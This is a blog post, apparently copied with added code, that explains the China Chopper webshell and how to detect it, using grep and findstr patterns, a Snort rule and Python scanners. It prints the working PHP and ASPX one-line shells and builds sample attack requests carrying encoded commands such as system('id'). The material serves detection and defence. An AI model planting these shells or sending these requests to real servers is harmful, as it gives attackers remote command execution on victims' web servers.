# China Chopper webshell

Copied from Andrea Fortuna's website; <https://www.andreafortuna.org/2018/03/28/what-is-the-china-chopper-webshell-and-how-to-find-it-on-a-compromized-system/>

## What is the China Chopper Webshell, and how to find it on a compromised system?

March 28, 2018

Some days ago, during a chat with a friend who works in a small software development company, the topic of webshells came up.

During the migration of a production system, my friend found some suspicious **.php** files, which turned out to be **China Chopper webshells**.

**A simple software upgrade turned into a cybersecurity nightmare.**

### What is China Chopper?

**China Chopper** is a **4KB** Web shell first discovered in **2012**.

It is widely used by Chinese and other malicious actors, including **APT** groups, to remotely access compromised Web servers.

The webshell consists mainly of two parts: the client interface (**caidao.exe**) and a small file placed on the compromised web server.

#### Why is this webshell so dangerous and hard to find?

The file dropped on the compromised server is really small. For example, the **PHP** version (the file found by my friend) consists of a single line of code:

```
<?php @eval($_POST['password']);?>
```

Even with limited access to the compromised host, it is very simple for an attacker to write this small piece of code into a file.

So all the logic is delegated to the client (**caidao.exe**), which communicates directly with the file dropped on the web server and provides a lot of interesting features, such as a **file explorer**, a **database client**, an **interactive command shell** and a **“Security Scan”** that performs brute-force password guessing against authentication portals.

An analysis of **caidao.exe** is available here: <https://www.hybrid-analysis.com/sample/be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77?environmentId=100>

China Chopper can run on any web server capable of executing **JSP**, **ASP**, **ASPX**, **PHP** or **CFM**, on both **Windows** and **Linux**.

Because the server-side payload is so small, the delivery mechanism can be very flexible, for example:

* WebDAV file upload
* **JBoss jmx-console** or **Apache Tomcat** management pages
* Cross-site scripting (**XSS**)
* **SQL** injection
* Vulnerabilities in applications/services
* File processing vulnerabilities
* Remote file include (**RFI**) and local file include (**LFI**) vulnerabilities
* Lateral propagation from other access

**This OS and application flexibility makes this an even more dangerous Web shell.**

### How can I detect this webshell on my webserver?

The quickest and easiest method is using regular expressions. On a Linux machine, an egrep across your web directory can help identify infected files (for the **.PHP** version; the pattern tolerates any parameter name, not only `password`):

```
# search recursively from the web root, looking only at PHP files
egrep -r --include='*.php' '[<][?]php\s+@eval[(]\$_POST\[.+\][)];[?][>]' /var/www
```

On a Windows machine, you can search files using regular expressions with the native findstr command (run it from the web root, since `/S` recurses from the current directory):

```
findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php
```

and for the **.aspx** version:

```
findstr /R /S "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx
```
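The grep patterns above are tied to one exact spelling of the shell: an attacker who adds a space, swaps quote style or renames the parameter slips past them. The scanner below is an added example (my own code, not part of the original post) that walks a web root with loosened versions of the two patterns the post shows (PHP and ASPX) plus a broader eval-of-request-parameter heuristic of my own, and reports the file size alongside each hit, since a genuine China Chopper file is tiny. The sample web root, file names and the ASP-style lookalike are constructed for the example.

```python
import os
import re
import tempfile

# Patterns for the two China Chopper one-liners the post shows (PHP and ASPX),
# loosened so extra whitespace, either quote style and a parameter name other
# than "password" still match. "generic" is a broader heuristic of my own (an
# eval() fed straight from a request parameter) meant to catch hand-edited
# variants; it is not a pattern from the post or from FireEye's report.
CHOPPER_PATTERNS = {
    "php": re.compile(
        r"<\?php\s+@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[\s*['\"]?\w+['\"]?\s*\]"
        r"\s*\)\s*;?\s*\?>",
        re.I,
    ),
    "aspx": re.compile(
        r"<%@\s*Page\s+Language\s*=\s*['\"]?J?Script['\"]?\s*%>\s*<%\s*eval\s*\("
        r"\s*Request\.Item\s*\[\s*['\"]?\w+['\"]?\s*\]\s*,\s*['\"]unsafe['\"]\s*\)",
        re.I,
    ),
    "generic": re.compile(
        r"\beval\s*\(?\s*(?:\$_(?:POST|GET|REQUEST)\s*\[|Request(?:\.Item)?\s*[\[(]"
        r"|request\.getParameter\s*\()",
        re.I,
    ),
}

# Extensions worth scanning; the shell runs wherever the server will execute it.
WEB_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".jsp", ".cfm"}


def classify(source: str) -> list:
    """Return the names of every pattern that matches the file contents."""
    return [name for name, rx in CHOPPER_PATTERNS.items() if rx.search(source)]


def scan_tree(root: str) -> list:
    """Walk a web root and return (path, size_in_bytes, matches) for flagged files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            # latin-1 decodes any byte sequence, so an odd encoding cannot abort the scan
            matches = classify(data.decode("latin-1"))
            if matches:
                hits.append((path, len(data), matches))
    return sorted(hits)


# Constructed sample web root (not real captures): one exact copy of the PHP
# shell, a whitespace-and-quote variant, the ASPX form, an ASP-style lookalike
# that only the heuristic catches, a benign page, and a .txt that is skipped.
SAMPLE_FILES = {
    "index.php": '<?php echo "hello"; ?>\n',
    "uploads/.cache.php": "<?php @eval($_POST['password']);?>",
    "img/thumb.php": '<?php  @eval( $_POST["cmd"] ) ; ?>\n',
    "app/Default.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "old/conn.asp": '<%eval request("pass")%>',
    "notes/readme.txt": "<?php @eval($_POST['password']);?>",
}


def write_samples(root: str) -> None:
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo() -> list:
    """Scan the constructed tree and return hits with paths relative to the root."""
    with tempfile.TemporaryDirectory() as root:
        write_samples(root)
        return [(os.path.relpath(p, root).replace(os.sep, "/"), size, m)
                for p, size, m in scan_tree(root)]


if __name__ == "__main__":
    for rel, size, matches in demo():
        print(f"{rel:<22} {size:>4} bytes  {', '.join(matches)}")
```

Point `scan_tree()` at the real document root instead of the temporary tree to use it in anger. Treat a `generic` hit without a `php` or `aspx` hit as something to read by hand: legitimate code very rarely evaluates a request parameter directly, but the heuristic is deliberately wide.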

### How to detect the malicious network traffic?

You can use a **Snort IDS** signature [published by FireEye](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf). Note that it keys on the string `FromBase64String`, which appears in the command wrapper the client sends to the **ASPX** variant; requests to the **PHP** variant use `base64_decode` instead, so the content match has to be adapted for that version:

```
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS 
(msg: "China Chopper with first Command Detected";
flow:to_server,established; content: "FromBase64String";
content: "z1"; content:"POST"; nocase;http_method;
reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html;
classtype:web-application-attack; sid: 900000101;)
```
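To make the rule's two content matches concrete, here is an added example (my own code, not from the original post or from FireEye) that applies the same checks to raw HTTP requests: it looks for the `FromBase64String` wrapper the Snort rule matches, adds the equivalent `eval(base64_decode($_POST[z0]))` check for the PHP variant, and base64-decodes the `z0`/`z1` arguments so an analyst can see what was actually sent. The wrapper is carried in a parameter named after the shell's password, so every parameter value is inspected rather than a fixed name. The sample requests are constructed, modelled on the request shape FireEye's analysis describes; the host, paths, password and stage code are made up.

```python
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, urlencode

# The string FireEye's Snort rule matches (ASPX client wrapper) and the
# equivalent for the PHP variant, whose wrapper uses base64_decode() instead.
INDICATORS = {
    "aspx-chopper": re.compile(r"FromBase64String\s*\(", re.I),
    "php-chopper": re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_POST\s*\[\s*z\d+\s*\]", re.I),
}
# Base64 blob embedded inline in the ASPX wrapper (the first command travels there).
INLINE_B64 = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')
# Extra arguments travel in z0, z1, ... (the "z1" content the Snort rule checks).
Z_PARAM = re.compile(r"z\d+")


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, body parameters)."""
    head, _, body = raw.partition("\r\n\r\n")
    method, path = head.split(" ", 2)[:2]
    return method, path, parse_qs(body, keep_blank_values=True)


def decode_argument(value: str) -> str:
    """Best-effort base64 decode of a z-parameter; returns the raw value if it is not base64."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:
        return value


def analyse(raw: str) -> Optional[dict]:
    """Return indicator names and decoded arguments for a China Chopper POST, else None."""
    method, path, params = parse_request(raw)
    if method.upper() != "POST":
        return None
    indicators, inline = set(), []
    for values in params.values():          # parameter name is the shell password, so check all
        for value in values:
            for tag, rx in INDICATORS.items():
                if rx.search(value):
                    indicators.add(tag)
            inline.extend(INLINE_B64.findall(value))
    if not indicators:
        return None
    decoded = {k: decode_argument(v[0]) for k, v in params.items() if Z_PARAM.fullmatch(k)}
    for i, blob in enumerate(inline):
        decoded[f"inline{i}"] = decode_argument(blob)
    return {"path": path, "indicators": sorted(indicators), "decoded": decoded}


# --- constructed traffic, modelled on the request shape FireEye describes ---
PHP_STAGE = b'@ini_set("display_errors","0");@set_time_limit(0);echo("->|");system("id");echo("<-|");'
ASPX_STAGE = b"Response.Write(Environment.MachineName);"
ASPX_WRAPPER = ('Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001)'
                '.GetString(System.Convert.FromBase64String("%s")),"unsafe");}'
                'catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("<-|");')


def b64(data: bytes) -> str:
    return base64.b64encode(data).decode()


def post(path: str, fields: dict) -> str:
    """Build a form-encoded POST the way the client would (made-up host and paths)."""
    return (f"POST {path} HTTP/1.1\r\nHost: www.example.test\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + urlencode(fields))


SAMPLES = {
    "php": post("/uploads/.cache.php", {
        "password": "@eval(base64_decode($_POST[z0]));",
        "z0": b64(PHP_STAGE),
        "z1": b64(b"cmd"),
    }),
    "aspx": post("/app/Default.aspx", {
        "password": ASPX_WRAPPER % b64(ASPX_STAGE),
        "z1": b64(b"cmd"),
    }),
    "login": post("/login", {"username": "alice", "password": "hunter2"}),
    "get": "GET /index.php?page=home HTTP/1.1\r\nHost: www.example.test\r\n\r\n",
}


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, "->", analyse(raw))
```

The ordinary login POST also carries a `password` field, which is why the check is on the value, not the name. In a real deployment feed the function from a proxy or IDS log that retains request bodies; bodies are where all the evidence is, since the request line itself is an unremarkable POST to a legitimate-looking page.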

### References

* <https://informationonsecurity.blogspot.it/2012/11/china-chopper-webshell.html>
* <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>
* <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>
* <http://blog.opensecurityresearch.com/2012/09/manually-exploiting-tomcat-manager.html>
* <https://www.hybrid-analysis.com/sample/be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77?environmentId=100>

